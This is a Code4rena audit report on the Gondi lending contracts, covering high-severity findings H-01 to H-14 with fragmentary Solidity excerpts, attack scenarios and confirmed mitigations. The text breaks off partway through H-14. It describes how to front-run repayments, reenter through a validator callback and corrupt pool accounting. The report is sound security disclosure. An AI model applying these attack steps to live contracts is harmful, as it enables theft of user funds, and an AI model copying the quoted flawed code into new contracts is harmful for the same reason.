Gondi Invitational
Findings & Analysis Report


Table of contents


About C4

Code4rena (C4) is an open organization consisting of security researchers, auditors, developers, and individuals with domain expertise in smart contracts.

A C4 audit is an event in which community participants, referred to as Wardens, review, audit, or analyze smart contract logic in exchange for a bounty provided by sponsoring projects.

During the audit outlined in this document, C4 conducted an analysis of the Gondi smart contract system written in Solidity. The audit took place between April 8 — April 16, 2024.

Following the C4 audit, 3 wardens (bin2chen, minhquanym and oakcobalt) reviewed the mitigations for all identified issues; the mitigation review report is appended below the audit report.

Additionally, a follow up Invitational audit was performed on the codebase. The final report can be viewed here.


In Code4rena’s Invitational audits, the competition is limited to a small group of wardens; for this audit, 5 wardens contributed reports:

  1. bin2chen
  2. minhquanym
  3. oakcobalt
  4. zhaojie
  5. erebus

This audit was judged by 0xA5DF.

Final report assembled by thebrittfactor.


The C4 analysis yielded an aggregated total of 37 unique vulnerabilities. Of these vulnerabilities, 17 received a risk rating in the category of HIGH severity and 20 received a risk rating in the category of MEDIUM severity.

Additionally, C4 analysis included 3 reports detailing issues with a risk rating of LOW severity or non-critical. There was also 1 report recommending gas optimizations.

All of the issues presented here are linked back to their original finding.


The code under review can be found within the C4 Gondi repository, and is composed of 28 smart contracts written in the Solidity programming language and includes 3669 lines of Solidity code.

Severity Criteria

C4 assesses the severity of disclosed vulnerabilities based on three primary risk categories: high, medium, and low/non-critical.

High-level considerations for vulnerabilities span the following key areas when conducting assessments:

  • Malicious Input Handling
  • Escalation of privileges
  • Arithmetic
  • Gas use

For more information regarding the severity criteria referenced throughout the submission review process, please refer to the documentation provided on the C4 website, specifically our section on Severity Categorization.

High Risk Findings (17)

[H-01] Merging tranches could make _loanTermination() accounting incorrect

Submitted by minhquanym, also found by bin2chen

In the Pool contract, when a loan is repaid or liquidated, a call to the Pool is made for accounting. The _loanTermination() function is eventually invoked. This function uses the loanId to determine the withdrawal queue to which the loan belongs. If the loan was issued after the last queue, it belongs entirely to the pool, and _outstandingValues is updated. If not, it updates the queue accounting, queue outstanding values, getTotalReceived and getAvailableToWithdraw.

function _loanTermination(
) private {
    uint256 pendingIndex = _pendingQueueIndex;
    uint256 totalQueues = getMaxTotalWithdrawalQueues + 1;
    uint256 idx;
    /// @dev oldest queue is the one after pendingIndex
    uint256 i;
    for (i = 1; i < totalQueues;) {
        idx = (pendingIndex + i) % totalQueues;
        if (getLastLoanId[idx][_loanContract] >= _loanId) {
        unchecked {
    /// @dev We iterated through all queues and never broke, meaning it was issued after the newest one.
    if (i == totalQueues) {
        _outstandingValues =
            _updateOutstandingValuesOnTermination(_outstandingValues, _principalAmount, _apr, _interestEarned);
    } else {
        uint256 pendingToQueue =
            _received.mulDivDown(PRINCIPAL_PRECISION - _queueAccounting[idx].netPoolFraction, PRINCIPAL_PRECISION);
        getTotalReceived[idx] += _received;
        getAvailableToWithdraw += pendingToQueue;
        _queueOutstandingValues[idx] = _updateOutstandingValuesOnTermination(
            _queueOutstandingValues[idx], _principalAmount, _apr, _interestEarned

However, the mergeTranches() function is permissionless and only requires the merged tranches to be contiguous. Once tranches are merged, the loanId of the new tranche changes, which can lead to incorrect accounting in the Pool.

Proof of Concept

Consider the following scenario:

  1. A borrower opens a loan and takes liquidity from multiple offers of the same Pool. The loan has the parameters loanId = 100, with two tranches, both having lender = pool_address.
  2. In the Pool, assume getLastLoanId[1][loan] = 100, indicating that queue index 1 points to the latest loanId in the loan contract.
  3. An attacker calls mergeTranches() to merge the two tranches of loanId = 100 with the same lender, which is the pool address. The new newLoanId = 101 is used in the new tranche.
  4. Now, when the loan is repaid, the _loanTermination() function is invoked with _loanId = 101. The loop returns i == totalQueues, making the loan belong entirely to the pool, while it should belong to withdrawal queue index 1.


tranche[_minTranche] = IMultiSourceLoan.Tranche(
    _newLoanId, // @audit can be used to change loanId
    cumAprBps / principalAmount

Limit the ability to call mergeTranches() directly to lenders only.

0xend (Gondi) confirmed

Gondi mitigated:

Only tranche lender can call mergeTranches so it assumes the responsibility.

Status: Mitigation confirmed. Full details in reports from minhquanym and bin2chen.

[H-02] Division before multiplication could lead to users losing 50% in WithdrawalQueue

Submitted by minhquanym

In the _getAvailable() function, the calculation performs division before multiplication, which could result in precision loss. The consequence is that users may not be able to withdraw the amount they should receive, leaving some funds locked in the WithdrawalQueue.

// @audit division before multiplication
function _getAvailable(uint256 _tokenId) private view returns (uint256) {
    return getShares[_tokenId] * _getWithdrawablePerShare() - getWithdrawn[_tokenId]; 

/// @notice Get the amount that can be withdrawn per share.
function _getWithdrawablePerShare() private view returns (uint256) {
    return (_totalWithdrawn + _asset.balanceOf(address(this))) / getTotalShares;

Proof of Concept

Consider the following scenario:

getShares[_tokenId] = 1e8
getWithdrawn[_tokenId] = 0
_totalWithdrawn = 0
_asset.balanceOf(address(this)) = 1e9 (1000 USDC)
getTotalShares = 5e8 + 1

The current calculation will yield:

_getWithdrawablePerShare() = 1e9 / (5e8 + 1) = 1
_getAvailable() = 1e8 * 1 - 0 = 1e8 = 100000000

However, the users should actually receive:

getShares[_tokenId] * _asset.balanceOf(address(this)) / getTotalShares
= 1e8 * 1e9 / (5e8 + 1) = 199999999

As shown, the users lose almost 50% of what they should receive.

Change the order of calculation to multiply before division.

Assessed type


0xend (Gondi) confirmed

Gondi mitigated:

Change order in multiplication/division as suggested.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[H-03] Function distribute() lacks access control allowing anyone to spam and disrupt the pool’s accounting

Submitted by minhquanym, also found by zhaojie

The LiquidationDistributor contract manages the distribution of funds after a liquidation auction is settled. It distributes the received funds to the lenders of the loan. If the lender has implemented the LoanManager interface, it will also call loanLiquidation() on the lender’s address. The Pool, when loanLiquidation() is called, will conduct an accounting process to ensure that the received funds are fairly distributed to the depositors.

function loanLiquidation(
    uint256 _loanId,
    uint256 _principalAmount,
    uint256 _apr,
    uint256 _protocolFee,
    uint256 _received,
    uint256 _startTime
) external override onlyAcceptedCallers {
    uint256 netApr = _netApr(_apr, _protocolFee);
    uint256 interestEarned = _principalAmount.getInterest(netApr, block.timestamp - _startTime);
    uint256 fees = IFeeManager(getFeeManager).processFees(_received, 0);
    getCollectedFees += fees;
    // @audit Accounting logic
    _loanTermination(msg.sender, _loanId, _principalAmount, netApr, interestEarned, _received - fees);

However, the distribute() function lacks access control. Consequently, an attacker could directly call it with malicious data, leading to incorrect accounting in the Pool.

Proof of Concept

Observe how the loanLiquidation() function is called:

function _handleLoanManagerCall(IMultiSourceLoan.Tranche calldata _tranche, uint256 _sent) private {
    if (getLoanManagerRegistry.isLoanManager(_tranche.lender)) {

As shown above, the principalAddress is not passed in, meaning it will not be validated by the Pool. Therefore, an attacker can simply call the distribute() function with loan.principalAddress set to a random ERC20 token. This token will still be transferred to the Pool. However, the Pool will mistake this token as its asset token (USDC/WETH) and perform the accounting accordingly.

Only allow Loan contracts to call the distribute() function.

Assessed type

Access Control

0xend (Gondi) confirmed

Gondi mitigated:

Added caller check to avoid anyone calling distribute.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[H-04] Function refinanceFromLoanExecutionData() does not check executionData.tokenId == loan.nftCollateralTokenId

Submitted by minhquanym, also found by oakcobalt and bin2chen

The refinanceFromLoanExecutionData() function is used to refinance a loan from LoanExecutionData. It allows borrowers to use outstanding offers for new loans to refinance their current loan. This function essentially combines two actions: it processes the repayment for the previous loan and then emits a new loan.

The key difference is that the same NFT is used as collateral for the new loan, so it does not need to be transferred out of the protocol and then transferred back in. However, there is no check to ensure that the NFT id of the old loan matches the NFT id of the new execution data.

Therefore, the new loan may have a collateral NFT that does not match the NFT that the lender requested in their offers.

/// @dev We first process the incoming offers so borrower gets the capital. After that, we process repayments.
///      NFT doesn't need to be transferred (it was already in escrow)
(uint256 newLoanId, uint256[] memory offerIds, Loan memory loan, uint256 totalFee) =
    executionData.tokenId, // @audit No check if matched with loan.nftCollateralTokenId

Proof of Concept

As we can see, executionData.tokenId is passed to the _processOffersFromExecutionData() function instead of loan.nftCollateralTokenId. This function performs all the checks to ensure that the lenders’ offers accept this NFT.

function _processOffersFromExecutionData(
    address _borrower,
    address _principalReceiver,
    address _principalAddress,
    address _nftCollateralAddress,
    uint256 _tokenId,
    uint256 _duration,
    OfferExecution[] calldata _offerExecution
) private returns (uint256, uint256[] memory, Loan memory, uint256) {

Eventually, it calls the _checkValidators() function to check the NFT token ID.

function _checkValidators(LoanOffer calldata _loanOffer, uint256 _tokenId) private {
    uint256 offerTokenId = _loanOffer.nftCollateralTokenId;
    if (_loanOffer.nftCollateralTokenId != 0) {
        if (offerTokenId != _tokenId) {
            revert InvalidCollateralIdError();
    } else {
        uint256 totalValidators = _loanOffer.validators.length;
        if (totalValidators == 0 && _tokenId != 0) {
            revert InvalidCollateralIdError();
        } else if ((totalValidators == 1) && (_loanOffer.validators[0].validator == address(0))) {
        for (uint256 i = 0; i < totalValidators;) {
            IBaseLoan.OfferValidator memory thisValidator = _loanOffer.validators[i];
            IOfferValidator(thisValidator.validator).validateOffer(_loanOffer, _tokenId, thisValidator.arguments);
            unchecked {

However, since executionData.tokenId is passed in, an attacker could pass in a valid tokenId (an NFT id that will be accepted by all lender offers). But in reality, the loan.nftCollateralTokenId will be the NFT kept in escrow.

Add a check to ensure that executionData.tokenId is equal to loan.nftCollateralTokenId.

Assessed type

Invalid Validation

0xend (Gondi) confirmed via duplicate Issue #14

Gondi mitigated:

Added tokenIdCheck.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[H-05] triggerFee is stolen from other auctions during settleWithBuyout()

Submitted by minhquanym, also found by bin2chen

The function settleWithBuyout() is used to settle an auction with a buyout from the main lender. This lender needs to repay all other lenders and will receive the NFT collateral. Near the end of the function, the triggerFee is also paid to the auction originator. However, the funds used to pay this fee are taken directly from the contract balance, even though the main lender doesn’t transfer these funds into the contract.

function settleWithBuyout(
) external nonReentrant {
    // @note Repay other lenders
    ERC20 asset = ERC20(_auction.asset); 
    uint256 totalOwed;
    for (uint256 i; i < _loan.tranche.length;) {
    IMultiSourceLoan(_auction.loanAddress).loanLiquidated(_auction.loanId, _loan);
    // @audit There is no fund in this contract to pay triggerFee
    asset.safeTransfer(_auction.originator, totalOwed.mulDivDown(_auction.triggerFee, _BPS)); 

As a result, if the auction contract balance is insufficient to cover the fee, the function will simply revert and prevent the main lender from buying out. In other cases where multiple auctions are running in parallel, the triggerFee will be deducted from the other auctions. This could lead to the last auctions being unable to settle due to insufficient balance.

Proof of Concept

The function settleWithBuyout() is called before any placeBid() so the funds is only from main lender. In the settleWithBuyout(), there are 2 transfers asset. One is to pay other lenders and one is to pay the triggerFee. As you can see in the code snippet, there is no triggerFee transfer from sender to originator.

Consider using safeTransferFrom() to pay the triggerFee from the sender’s address, rather than using safeTransfer() to pay the triggerFee from the contract balance.

0xend (Gondi) confirmed

0xA5DF (judge) commented:

Sustaining high severity because this is going to cause a loss of principal to other auctions.

Gondi mitigated:

Change to safeTransferFrom buyer.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[H-06] Function settleWithBuyout() does not call LoanManager.loanLiquidation() during a buyout

Submitted by minhquanym, also found by bin2chen

Lenders in the Gondi protocol could be EOA and Gondi Pool. Gondi Pool, an ERC4626, allows anyone to deposit funds and earn yield from lending on Gondi. Gondi Pool implemented the LoanManager interfaces, which include the validateOffer(), loanRepayment(), and loanLiquidation() functions. The functions loanRepayment() and loanLiquidation() are called when a borrower repays the loan or the loan is liquidated, i.e., when the Pool receives funds back from MultiSourceLoan. Both functions is used to update the queue accounting and the outstanding values of the Pool.

ERC20 asset = ERC20(_auction.asset); 
uint256 totalOwed;
// @audit Repay lender but not call LoanManager.loanLiquidation()
for (uint256 i; i < _loan.tranche.length;) {
    if (i != largestTrancheIdx) { 
        IMultiSourceLoan.Tranche calldata thisTranche = _loan.tranche[i];
        uint256 owed = thisTranche.principalAmount + thisTranche.accruedInterest
            + thisTranche.principalAmount.getInterest(thisTranche.aprBps, block.timestamp - thisTranche.startTime);
        totalOwed += owed; 
        asset.safeTransferFrom(msg.sender, thisTranche.lender, owed);
    unchecked {
IMultiSourceLoan(_auction.loanAddress).loanLiquidated(_auction.loanId, _loan);

In the settleWithBuyout() function, the main lender buys out the loan by repaying all other lenders directly. However, loanLiquidation() is not called, leading to incorrect accounting in the Pool.

Proof of Concept

The loanLiquidation() function handles accounting in the pool.


function loanLiquidation(
) external override onlyAcceptedCallers {
    uint256 netApr = _netApr(_apr, _protocolFee);
    uint256 interestEarned = _principalAmount.getInterest(netApr, block.timestamp - _startTime);
    uint256 fees = IFeeManager(getFeeManager).processFees(_received, 0);
    getCollectedFees += fees;
    _loanTermination(msg.sender, _loanId, _principalAmount, netApr, interestEarned, _received - fees);

Consider checking and calling loanLiquidation() in settleWithBuyout() to ensure accurate accounting in the pool.

0xend (Gondi) confirmed and commented:

Changing interest paid to use the end of the loan (this appears in another issue since this delta in time otherwise breaks the maxSeniorRepayment concept).

Gondi mitigated:

Added loanLiquidation call.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[H-07] deployWithdrawalQueue() need to clear _queueAccounting[lastQueueIndex]

Submitted by bin2chen

In deployWithdrawalQueue(), only clears _queueOutstandingValues[lastQueueIndex] and _outstandingValues, but doesn’t clear _queueAccounting[lastQueueIndex].

    function deployWithdrawalQueue() external nonReentrant {

        /// @dev We move outstanding values from the pool to the queue that was just deployed.
        _queueOutstandingValues[pendingQueueIndex] = _outstandingValues;
        /// @dev We clear values of the new pending queue.
        delete _queueOutstandingValues[lastQueueIndex];
        delete _outstandingValues;
@>      //@audit miss delete _queueAccounting[lastQueueIndex]


@>      _pendingQueueIndex = lastQueueIndex;

        // Cannot underflow because the sum of all withdrawals is never larger than totalSupply.
        unchecked {
            totalSupply -= sharesPendingWithdrawal;

After this method, anyone calling queueClaimAll() will use this stale data _queueAccounting[lastQueueIndex].

queueClaimAll() -> _queueClaimAll(_pendingQueueIndex)-> _updatePendingWithdrawalWithQueue(_pendingQueueIndex)

    function _updatePendingWithdrawalWithQueue(
        uint256 _idx,
        uint256 _cachedPendingQueueIndex,
        uint256[] memory _pendingWithdrawal
    ) private returns (uint256[] memory) {
        uint256 totalReceived = getTotalReceived[_idx];
        uint256 totalQueues = getMaxTotalWithdrawalQueues + 1;
        /// @dev Nothing to be returned
        if (totalReceived == 0) {
            return _pendingWithdrawal;
        getTotalReceived[_idx] = 0;

        /// @dev We go from idx to newer queues. Each getTotalReceived is the total
        /// returned from loans for that queue. All future queues/pool also have a piece of it.
        /// X_i: Total received for queue `i`
        /// X_1  = Received * shares_1 / totalShares_1
        /// X_2 = (Received - (X_1)) * shares_2 / totalShares_2 ...
        /// Remainder goes to the pool.
        for (uint256 i; i < totalQueues;) {
            uint256 secondIdx = (_idx + i) % totalQueues;
@>          QueueAccounting memory queueAccounting = _queueAccounting[secondIdx];
            if (queueAccounting.thisQueueFraction == 0) {
                unchecked {
            /// @dev We looped around.
@>          if (secondIdx == _cachedPendingQueueIndex + 1) {
            uint256 pendingForQueue = totalReceived.mulDivDown(queueAccounting.thisQueueFraction, PRINCIPAL_PRECISION);
            totalReceived -= pendingForQueue;

            _pendingWithdrawal[secondIdx] = pendingForQueue;
            unchecked {
        return _pendingWithdrawal;


Not clearing _queueAccounting[lastQueueIndex] when executing queueClaimAll() will use this stale data to distribute totalReceived.

    function deployWithdrawalQueue() external nonReentrant {

        /// @dev We move outstaning values from the pool to the queue that was just deployed.
        _queueOutstandingValues[pendingQueueIndex] = _outstandingValues;
        /// @dev We clear values of the new pending queue.
        delete _queueOutstandingValues[lastQueueIndex];
+       delete _queueAccounting[lastQueueIndex]
        delete _outstandingValues;


        _pendingQueueIndex = lastQueueIndex;

        // Cannot underflow because the sum of all withdrawals is never larger than totalSupply.
        unchecked {
            totalSupply -= sharesPendingWithdrawal;

Assessed type


0xend (Gondi) confirmed

Gondi mitigated:

Clear state vars.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[H-08] Incorrect circular array check in _updatePendingWithdrawalWithQueue flow, causing received funds to be added to the wrong queues

Submitted by oakcobalt

In Pool.sol, queueClaimAll flow will transfer received funds (returned funds from loans) for each queue to newer queues.

Received funds for a given queue are intended to be distributed to newer queues:

   /// @dev We go from idx to newer queues. Each getTotalReceived is the total        
   /// returned from loans for that queue. All future queues/pool also have a piece of it.
   /// X_i: Total received for queue `i`
   /// X_1  = Received * shares_1 / totalShares_1
   /// X_2 = (Received - (X_1)) * shares_2 / totalShares_2 ...
   /// Remainder goes to the pool.

This logic is implemented in _updatePendingWithdrawalWithQueue(). Due to queue arrays are circular, the array index never exceeds getMaxTotalWithdrawalQueues and will restart from 0.

% totalQueues should be used when checking array indexes in most cases. However, in the queue index for-loop, if (secondIdx == _cachedPendingQueueIndex + 1) {break;} is used to break the loop instead of secondIdx == (_cachedPendingQueueIndex + 1)%totalQueues.

This is problematic in some cases:

  1. When _cachedPendingQueueIndex < getMaxTotalWithdrawalQueues. _updatePendingWithdrawalWithQueue() will always skip the oldest queue when distributing getTotalReceived[_idx] funds.

    In _queueClaimAll(), the first for-loop start with the oldestQueueIndex (_cachedPendingQueueIndex + 1) % totalQueues + 0)%totalQueues). When (_cachedPendingQueueIndex + 1) % totalQueues== _cachedPendingQueueIndex + 1, this first iteration will always result in a break in the second for-loop, where secondIdx == oldestQueueIndex == _cachedPendingQueueIndex + 1.

    As a result, any received funds from the oldesQueueIndex (getTotalReceived\[oldestQueueIndex\]) will not be distributed and directly deleted (getTotalReceived[_idx] = 0;).

  2. When _cachedPendingQueueIndex == getMaxTotalWithdrawalQueues The second for-loop will never break, because secondIdx < _cachedPendingQueueIndex + 1. for (uint256 i; i < totalQueues;) will always run getMaxTotalWithdrawalQueues+1 times. This will result in received funds from any queues being distributed to both newer queues and older queues.

Based on my understanding, this should be if (i≠0 && secondIdx == (_cachedPendingQueueIndex + 1)%totalQueues) { break;}

Assessed type


0xA5DF (judge) commented:

causing received funds to be added to the wrong queues

What are the consequences of that? I’ll might consider high severity if this leads to frozen funds.

0xend (Gondi) confirmed and commented:

Conversation continued over discord. There’s a bug here I believe (a high severity one), the condition for breaking the loop should be secondIdx == _cachedPendingQueueIndex.

0xA5DF (judge) increased severity to High

Gondi mitigated:

Need to break 1 before.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[H-09] Incorrect accounting of _pendingWithdrawal in queueClaiming flow

Submitted by oakcobalt, also found by bin2chen

Incorrect accounting of _pendingWithdrawal in queueClaiming flow, funds received from a previous queue index will be lost.

Proof of Concept

In Pool.sol’s queueClaimAll(), each queue’s received funds getTotalReceived[_idx] (total returned funds from loans for that queue) will be distributed to all newer queues in a for-loop.

There are two for-loops in this flow. First for-loop iterate through each pendingWithdrawal index to get the received funds for that queue index (getTotalReceived[_idx]). Second for-loop iterates through each queue index again to distribute funds from _idx.

The problem is in the second for-loop, _pendingWithdrawal[secondIdx] will not accumulate distributed funds from previous queue indexes, instead it erases the value from previous loops and only records the last queue’s received funds.

    function _updatePendingWithdrawalWithQueue(
        uint256 _idx,
        uint256 _cachedPendingQueueIndex,
        uint256[] memory _pendingWithdrawal
    ) private returns (uint256[] memory) {
        uint256 totalReceived = getTotalReceived[_idx];
        uint256 totalQueues = getMaxTotalWithdrawalQueues + 1;
        getTotalReceived[_idx] = 0;
        for (uint256 i; i < totalQueues;) {
              //@audit this should be _pendingWithdraw[secondIdx] += pendingForQueue; Current implementation directly erases `pendingForQueue` value distributed from other queues. 
|>            _pendingWithdrawal[secondIdx] = pendingForQueue;


Note that getTotalReceived[_idx] will be cleared before the for-loop (getTotalReceived[_idx] = 0), meaning that the erased pendingForQueue values from previous loops cannot be recovered. _pendingWithdrawal will be incorrect.

Change into _pendingWithdrawal[secondIdx] + = pendingForQueue;.

Assessed type


0xend (Gondi) confirmed

Gondi mitigated:

Missing +.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[H-10] The attackers front-running repayloans so that the debt cannot be repaid

Submitted by zhaojie, also found by minhquanym

The attackers make it impossible for borrowers to repay their debts, and the collateral is liquidated when the debts mature.

Proof of Concept

repayLoan needs to check the loanId; if the id is inconsistent it will revert.

    function repayLoan(LoanRepaymentData calldata _repaymentData) external override nonReentrant {
        uint256 loanId = _repaymentData.data.loanId;
        Loan calldata loan = _repaymentData.loan;
@>      _baseLoanChecks(loanId, loan);
    function _baseLoanChecks(uint256 _loanId, Loan memory _loan) private view {
        if (_loan.hash() != _loans[_loanId]) {
            revert InvalidLoanError(_loanId);
        if (_loan.startTime + _loan.duration < block.timestamp) {
            revert LoanExpiredError();

The problem is that _loans[_loanId] can change; for example, when mergeTranches deletes the old loanId and writes the new one:

    _loans[loanId] = loanMergedTranches.hash();
    delete _loans[_loanId];

An attacker can use the front-running attack method. When repayLoan is called, execute the mergeTranches function in advance, and make the id in _loans updated. In this case, the repayLoan execution will fail due to inconsistent _loanId.

If the attacker keeps using this attack, the borrower’s debt will not be repaid; eventually causing the collateral to be liquidated.

In addition to the mergeTranches function, the attacker can also call addNewTranche, and the borrower can also call the refinance-related function, again causing _loanId to be updated.

An attacker can also use the same method to attack refinance related functions, making refinance unable to execute. An attacker can also use the same method to attack the liquidateLoan function, making it impossible for debts to be cleared.

Tools Used


Do not delete _loanId.

Assessed type


0xA5DF (judge) commented:

I have some doubts about severity, since this requires too many resources from the attacker (see here), and the addNewTranche() requires the lender’s signature (and when using mergeTranches() alone the attacker would eventually run out of tranches to merge).

0xend (Gondi) confirmed and commented:

I think this is low (agree with judge for those reasons).

0xA5DF (judge) decreased severity to Low and commented:

I think there are too many limitations on this one, and the motivation for the attacker isn’t very high - they’re not going to get the entire principal from this.

0xend (Gondi) commented:

Given the limit on tranches the attacker can only run this a handful of times.

zhaojie (warden) commented:

I think it’s a high risk, because anyone can be an attacker, so Lender can be an attacker.

If the lender does not want the borrower to repay the debt, the lender can use addNewTranche/mergeTranches and to attack repayLoans and make the borrower’s loan impossible to repay, especially when the loan is about to expire. This causes the borrower’s NFT to be loss, so it would have a high impact.

When _liquidateLoan, if _canClaim == true, the borrower can get the NFT directly:

    function _liquidateLoan....{
        if (_canClaim) {
                address(this), _loan.tranche[0].lender, _loan.nftCollateralTokenId
            emit LoanForeclosed(_loanId);

            liquidated = true;

     function liquidateLoan(uint256 _loanId, Loan calldata _loan)...  {
        (bool liquidated, bytes memory liquidation) = _liquidateLoan(
            _loanId, _loan, _loan.tranche.length == 1 && !getLoanManagerRegistry.isLoanManager(_loan.tranche[0].lender)

An attacker/lender can use mergeTranches to make _loan.tranche.length == 1. The key issue is that loanId will be reset.

0xA5DF (judge) increased severity to High and commented:

You’re right that the lender has a high motivation to execute this attack. You’re also right that when the borrower attempts to repay close to the expiry time this attack becomes feasible.

While some conditions are required in order for this to work, it still seems pretty likely to happen. Due to those reasons I’m reinstating high severity.

Side note: I think that a better mitigation would be to not allow functions that change the loanID to run near the expiry time.

0xend (Gondi) commented:

No specific PR here since it’s addressed when limiting addNewTranche to only be able to be called by the borrower and checking in refinancePartial that there’s at least one tranche being refinanced. This ends up limiting the number of times a loan can be locked by the lender (tranches are locked for some time after a refinance for future ones).

[H-11] Incorrect protocol fee implementation results in outstandingValues to be mis-accounted in Pool.sol

Submitted by oakcobalt

The vulnerability is that LiquidationDistributer::_handleLoanMangerCall hardcodes 0 as protocol fee when calling LoanManager(_tranche.lender).loanLiquidation().

    function _handleLoanManagerCall(IMultiSourceLoan.Tranche calldata _tranche, uint256 _sent) private {
        if (getLoanManagerRegistry.isLoanManager(_tranche.lender)) {
   |>           0,  //@audit this should be the actual protocol fee fraction

_handleLoanManagerCall() will be called as part of the flow to distribute proceeds from a liquidation.

When protocol fee is hardcoded 0, in the Pool::loanliquidation call, netApr will not account for protocol fee fraction which will inflate the _apr used to offset _outstandingValues.sumApr, a state variable that accounts for the total annual apr of outstanding loans.

        OutstandingValues memory __outstandingValues,
        uint256 _principalAmount,
        uint256 _apr,
        uint256 _interestEarned
    ) private view returns (OutstandingValues memory) {
         //@audit inflated _apr will offset __outstandingValues.sumApr to an incorrect lower value, causing accounting error
|>        __outstandingValues.sumApr -= uint128(_apr * _principalAmount);


For comparison, when a loan is created (pool::validateOffer), the actual protocol fee (protocolFee.fraction) will be passed, and __outstandingValues.sumApr will be added with the post-fee apr value, instead of the before-fee apr.

State accounting __outstandingValues will be incorrect, all flows that consume __outstandingValues.sumApr when calculating interests will be affected.

User _loan.protocolFeeinstead of 0.

0xend (Gondi) confirmed and commented:

Messes up with accounting, I think this is a high one.

Gondi mitigated:

Passing protocol fee.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[H-12] addNewTranche() no authorization from borrower

Submitted by bin2chen, also found by oakcobalt, minhquanym, and zhaojie

For addNewTranche(), the code implementation is as follows:

    function addNewTranche(
        RenegotiationOffer calldata _renegotiationOffer,
        Loan memory _loan,
        bytes calldata _renegotiationOfferSignature
    ) external nonReentrant returns (uint256, Loan memory) {
        uint256 loanId = _renegotiationOffer.loanId;

        _baseLoanChecks(loanId, _loan);
        _baseRenegotiationChecks(_renegotiationOffer, _loan);
@>      _checkSignature(_renegotiationOffer.lender, _renegotiationOffer.hash(), _renegotiationOfferSignature);
        if (_loan.tranche.length == getMaxTranches) {
            revert TooManyTranchesError();

        uint256 newLoanId = _getAndSetNewLoanId();
        Loan memory loanWithTranche = _addNewTranche(newLoanId, _loan, _renegotiationOffer);
        _loans[newLoanId] = loanWithTranche.hash();
        delete _loans[loanId];

            _renegotiationOffer.lender, _loan.borrower, _renegotiationOffer.principalAmount - _renegotiationOffer.fee
        if (_renegotiationOffer.fee > 0) {
            /// @dev Cached
            ProtocolFee memory protocolFee = _protocolFee;
                _renegotiationOffer.fee.mulDivUp(protocolFee.fraction, _PRECISION)

        emit LoanRefinanced(
            _renegotiationOffer.renegotiationId, loanId, newLoanId, loanWithTranche, _renegotiationOffer.fee

        return (newLoanId, loanWithTranche);

Currently only the signature of the lender is checked, not the authorization of the borrower. Then, any lender can add tranche to any loan by:

  1. Specifying a very high apr.
  2. Specifying any _renegotiationOffer.fee; for example: set _renegotiationOffer.fee==_renegotiationOffer.principalAmount.

This doesn’t make sense for borrower. It is recommended that only the borrower performs this method.


lender can be specified to generate a malicious tranche to compromise borrower.

    function addNewTranche(
        RenegotiationOffer calldata _renegotiationOffer,
        Loan memory _loan,
        bytes calldata _renegotiationOfferSignature
    ) external nonReentrant returns (uint256, Loan memory) {
        uint256 loanId = _renegotiationOffer.loanId;
+       if (msg.sender != _loan.borrower) {
+           revert InvalidCallerError();
+       } 
        _baseLoanChecks(loanId, _loan);
        _baseRenegotiationChecks(_renegotiationOffer, _loan);
        _checkSignature(_renegotiationOffer.lender, _renegotiationOffer.hash(), _renegotiationOfferSignature);
        if (_loan.tranche.length == getMaxTranches) {
            revert TooManyTranchesError();

Assessed type


0xend (Gondi) confirmed via duplicate Issue #52

Gondi mitigated:

Added caller check.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[H-13] _processOffersFromExecutionData() lack of check executionData.duration<=offer.duration

Submitted by bin2chen

emitLoan() only limits offer.duration != 0. There’s no limit in executionData.duration<=offer.duration.

emitLoan() -> _processOffersFromExecutionData() -> _validateOfferExecution()

    function _validateOfferExecution(
        OfferExecution calldata _offerExecution,
        uint256 _tokenId,
        address _lender,
        address _offerer,
        bytes calldata _lenderOfferSignature,
        uint256 _feeFraction,
        uint256 _totalAmount
    ) private {

@>      if (offer.duration == 0) {
            revert ZeroDurationError();
        if (offer.aprBps == 0) {
            revert ZeroInterestError();
        if ((offer.capacity > 0) && (_used[_offerer][offer.offerId] + _offerExecution.amount > offer.capacity)) { 
            revert MaxCapacityExceededError();

        _checkValidators(_offerExecution.offer, _tokenId);

If the executionData.duration time is not limited, it can lead to far exceeding the borrowing time offer.duration. If the lender is a LoanManager, when repayLoan() it can also exceed the maximum pendingQueues, leading to accounting issues.


Far exceeding the borrowing time than offer.duration. If lender is LoanManager also exceeds max pendingQueues, causing bookkeeping issues.

Check executionData.duration<=offer[n].duration.

Assessed type


0xend (Gondi) confirmed

0xA5DF (judge) commented:

Sustaining high due to accounting issues.

Gondi mitigated:

Added duration check.

Status: Mitigation confirmed. Full details in reports from oakcobalt, minhquanym and bin2chen.

[H-14] mergeTranches()/refinancePartial() lack of nonReentrant

Submitted by bin2chen

In mergeTranches(), the method’s code implementation is as follows:

 function mergeTranches(uint256 _loanId, Loan memory _loan, uint256 _minTranche, uint256 _maxTranche)
        returns (uint256, Loan memory)
        _baseLoanChecks(_loanId, _loan);
        uint256 loanId = _getAndSetNewLoanId();
        Loan memory loanMergedTranches = _mergeTranches(loanId, _loan, _minTranche, _maxTranche);
        _loans[loanId] = loanMergedTranches.hash();
        delete _loans[_loanId];

        emit TranchesMerged(loanMergedTranches, _minTranche, _maxTranche);

        return (loanId, loanMergedTranches);

As shown above, this method lacks reentrancy protection, which could allow reentrancy attacks to manipulate the _loans[].

Example: Suppose _loans[1] = {NFT = 1}

  1. Alice calls refinanceFromLoanExecutionData(_loans\[1],LoanExecutionData).

    • LoanExecutionData.ExecutionData.OfferExecution.LoanOffer.OfferValidator\[0].validator = CustomContract => for callback.
  2. refinanceFromLoanExecutionData() -> _processOffersFromExecutionData() -> _validateOfferExecution() -> _checkValidators() -> IOfferValidator(CustomContract).validateOffer().
  3. In IOfferValidator(CustomContract).validateOffer(), call MultiSourceLoan.mergeTranches(_loans[1]) -> pass without nonReentrant.

    • _loans\[3] = newLoan.hash()
  4. Return to refinanceFromLoanExecutionData(), will execute:

